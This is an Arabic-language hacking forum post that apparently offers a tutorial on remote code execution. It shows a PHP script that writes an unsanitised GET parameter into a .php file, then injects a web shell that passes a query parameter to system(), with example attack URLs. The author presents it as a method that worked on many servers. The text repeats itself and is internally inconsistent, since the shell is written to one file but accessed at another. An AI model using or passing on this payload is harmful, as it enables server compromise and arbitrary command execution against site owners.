Full Explain Remote Code Execution
السلام عليكم ورحمه الله وبركاته
السلام والصلاه على سيدنا محمد
سنشرح اليوم ثغره فريدة من نوعهآ ومعروفها وافادتني في سيرفرات كثيرة .
ان شاء الله يكون الشرح سهل جدا ..
الملف المصاب
الثغره تسمح لك بزرع كود خبيث ,
طلبنا الملف عبر المتغير Get
من ثم كونا الملف عبر ملف vbspiders بدالة fopen
ومن ثم قمنا بل تطبيق عبر الدالة fwrite ..
وفي الاخير غلقنا الخطاء بدالة fclose
الملف المصاب هو med.php
تمام بعد الرابط نزرع الملف ..
عن طريق ,,
تمام نجرب نزرع الملف ..
حلو تم زرع الملف ^_^
آتمنة ان افدتكم اخوكم حمد :smile:
السلام والصلاه على سيدنا محمد
سنشرح اليوم ثغره فريدة من نوعهآ ومعروفها وافادتني في سيرفرات كثيرة .
ان شاء الله يكون الشرح سهل جدا ..
الملف المصاب
PHP:
<?php
$school = $_GET['love'];
$ip = getenv('REMOTE_ADDR');
$error = fopen('vbspiders.php','a');
fwrite($error,'<br />'.$school.'<br />'.$ip.'<br />');
fclose($error);
?>الثغره تسمح لك بزرع كود خبيث ,
طلبنا الملف عبر المتغير Get
من ثم كونا الملف عبر ملف vbspiders بدالة fopen
ومن ثم قمنا بل تطبيق عبر الدالة fwrite ..
وفي الاخير غلقنا الخطاء بدالة fclose
الملف المصاب هو med.php
كود:
http://forum.advance-hackers.org/xx/med.php?love=تمام بعد الرابط نزرع الملف ..
عن طريق ,,
PHP:
<?php
$cmd=$_GET['mohamed'];
system($cmd);
?>تمام نجرب نزرع الملف ..
PHP:
http://forum.advance-hackers.org/xx/med.php?love=%3C?php$cmd=$_GET['mohamed'];system($cmd);?%3Eحلو تم زرع الملف ^_^
PHP:
http://forum.advance-hackers.org/xx/mohammed.phpآتمنة ان افدتكم اخوكم حمد :smile:
اسم الموضوع : Full Explain Remote Code Execution
|
المصدر : قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات